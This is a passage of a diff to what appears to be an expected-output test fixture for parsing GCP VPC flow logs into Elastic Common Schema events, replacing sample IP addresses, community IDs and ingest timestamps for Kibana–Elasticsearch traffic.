"{\"insertId\":\"y4wffpfk2erot\",\"jsonPayload\":{\"bytes_sent\":\"67315\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33536},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565156020Z\",\"packets_sent\":\"354\",\"reporter\":\"DEST\",\"rtt_msec\":\"194\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150481417Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150481417Z", "end": "2019-06-14T03:49:59.565156020Z", @@ -10796,18 +10796,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 175633, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 67 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:8dEsdSCqyZDg8ZlrEARjkF61tVk=", + "community_id": "1:8HPuUT0Nn+eIY1y5PdvmF0aw60A=", "bytes": 175633, "name": "default", "transport": "tcp", @@ -10829,7 +10829,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -10866,8 +10866,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868821700Z", - "original": "{\"insertId\":\"y4wffpfk2eroq\",\"jsonPayload\":{\"bytes_sent\":\"175633\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33576,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"67\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510464198Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391743Z", + "original": "{\"insertId\":\"y4wffpfk2eroq\",\"jsonPayload\":{\"bytes_sent\":\"175633\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33576,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"67\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510464198Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510464198Z", "end": "2019-06-14T03:49:51.821302149Z", @@ -10888,10 +10888,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33540, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -10905,7 +10905,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:MQOhdELEvqJXellZlJ8csNiAoAM=", + "community_id": "1:F/7D/X852gHR0MKQ6f237loatS0=", "bytes": 116981, "name": "default", "transport": "tcp", @@ -10928,7 +10928,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -10964,8 +10964,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868824900Z", - "original": "{\"insertId\":\"y4wffpfk2ero5\",\"jsonPayload\":{\"bytes_sent\":\"116981\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33540,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789112562Z\",\"packets_sent\":\"234\",\"reporter\":\"SRC\",\"rtt_msec\":\"313\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074813982Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391748700Z", + "original": "{\"insertId\":\"y4wffpfk2ero5\",\"jsonPayload\":{\"bytes_sent\":\"116981\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33540,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789112562Z\",\"packets_sent\":\"234\",\"reporter\":\"SRC\",\"rtt_msec\":\"313\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074813982Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074813982Z", "end": "2019-06-14T03:49:51.789112562Z", @@ -10992,18 +10992,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33690, "bytes": 67789, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 344 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:WEAf6ne8e1XsbHxRodKfYT1TGbg=", + "community_id": "1:R07THsJrApr+LxzJU52QZR3EPhM=", "bytes": 67789, "name": "default", "transport": "tcp", @@ -11025,7 +11025,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -11062,8 +11062,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868828100Z", - "original": "{\"insertId\":\"y4wffpfk2eroo\",\"jsonPayload\":{\"bytes_sent\":\"67789\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33690},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:48.542406314Z\",\"packets_sent\":\"344\",\"reporter\":\"DEST\",\"rtt_msec\":\"196\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075867049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391754200Z", + "original": "{\"insertId\":\"y4wffpfk2eroo\",\"jsonPayload\":{\"bytes_sent\":\"67789\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33690},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:48.542406314Z\",\"packets_sent\":\"344\",\"reporter\":\"DEST\",\"rtt_msec\":\"196\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075867049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075867049Z", "end": "2019-06-14T03:49:48.542406314Z", @@ -11084,10 +11084,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33538, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -11101,7 +11101,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:NoAWHdeVVE/1VjCAle3M10HSrH0=", + "community_id": "1:ZH1or4RA5RqLjC/iRPmayKRTLeA=", "bytes": 136166, "name": "default", "transport": "tcp", @@ -11124,7 +11124,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -11160,8 +11160,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868831100Z", - "original": "{\"insertId\":\"ptjoddfhmrhg9\",\"jsonPayload\":{\"bytes_sent\":\"136166\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33538,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565124617Z\",\"packets_sent\":\"245\",\"reporter\":\"SRC\",\"rtt_msec\":\"250\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074952616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391759800Z", + "original": "{\"insertId\":\"ptjoddfhmrhg9\",\"jsonPayload\":{\"bytes_sent\":\"136166\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33538,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565124617Z\",\"packets_sent\":\"245\",\"reporter\":\"SRC\",\"rtt_msec\":\"250\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074952616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074952616Z", "end": "2019-06-14T03:49:59.565124617Z", @@ -11190,17 +11190,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65257, "bytes": 68262, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 718 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:DqikX2/VHNCo3K4Z/FQLlk5o8C4=", + "community_id": "1:IOiOyU4WA7IZikjr7eAoksKW7Mw=", "bytes": 68262, "transport": "tcp", "type": "ipv4", @@ -11214,7 +11214,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, @@ -11239,8 +11239,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868834Z", - "original": "{\"insertId\":\"ptjoddfhmrhgh\",\"jsonPayload\":{\"bytes_sent\":\"68262\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65257},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220614265Z\",\"packets_sent\":\"718\",\"reporter\":\"DEST\",\"rtt_msec\":\"220\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.403388091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391765300Z", + "original": "{\"insertId\":\"ptjoddfhmrhgh\",\"jsonPayload\":{\"bytes_sent\":\"68262\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65257},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220614265Z\",\"packets_sent\":\"718\",\"reporter\":\"DEST\",\"rtt_msec\":\"220\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.403388091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.403388091Z", "end": "2019-06-14T03:49:56.220614265Z", @@ -11267,17 +11267,17 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 52328, "bytes": 1457, - "ip": "198.51.100.107", + "ip": "67.43.156.14", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:EE4Jx/GklVta9XikBj43wQU3qJM=", + "community_id": "1:zciDpB3TX5D1bnYbRXdjbgQDN+Q=", "bytes": 1457, "transport": "tcp", "type": "ipv4", @@ -11291,7 +11291,7 @@ }, "related": { "ip": [ - "198.51.100.107", + "67.43.156.14", "10.87.40.76" ] }, @@ -11316,8 +11316,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868837Z", - "original": "{\"insertId\":\"ptjoddfhmrhgj\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"198.51.100.107\",\"src_port\":52328},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:20.952481728Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:20.842840991Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391770800Z", + "original": "{\"insertId\":\"ptjoddfhmrhgj\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":52328},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:20.952481728Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:20.842840991Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:42:20.842840991Z", "end": "2019-06-14T03:42:20.952481728Z", @@ -11344,17 +11344,17 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 59790, "bytes": 1460, - "ip": "198.51.100.107", + "ip": "67.43.156.14", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:2VaSImZuAKUa2JwnaG4ATyMe4g0=", + "community_id": "1:tW5o1L9SEuS4pptFcAjo5fF6q5w=", "bytes": 1460, "transport": "tcp", "type": "ipv4", @@ -11368,7 +11368,7 @@ }, "related": { "ip": [ - "198.51.100.107", + "67.43.156.14", "10.87.40.76" ] }, @@ -11393,8 +11393,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868840Z", - "original": "{\"insertId\":\"ptjoddfhmrhgr\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"198.51.100.107\",\"src_port\":59790},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:50.702194466Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:50.590894439Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391776400Z", + "original": "{\"insertId\":\"ptjoddfhmrhgr\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":59790},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:50.702194466Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:50.590894439Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:50.590894439Z", "end": "2019-06-14T03:40:50.702194466Z", @@ -11423,17 +11423,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65317, "bytes": 73681, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 728 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:KUhb7O2JuCr67sFOvEo0t6q1bx0=", + "community_id": "1:Z1gkzsFxPRA+wdZ4AaO0v0oQz34=", "bytes": 73681, "transport": "tcp", "type": "ipv4", @@ -11447,7 +11447,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, @@ -11472,8 +11472,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868843100Z", - "original": "{\"insertId\":\"ptjoddfhmrhgn\",\"jsonPayload\":{\"bytes_sent\":\"73681\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65317},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"728\",\"reporter\":\"DEST\",\"rtt_msec\":\"62\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.740491697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391781900Z", + "original": 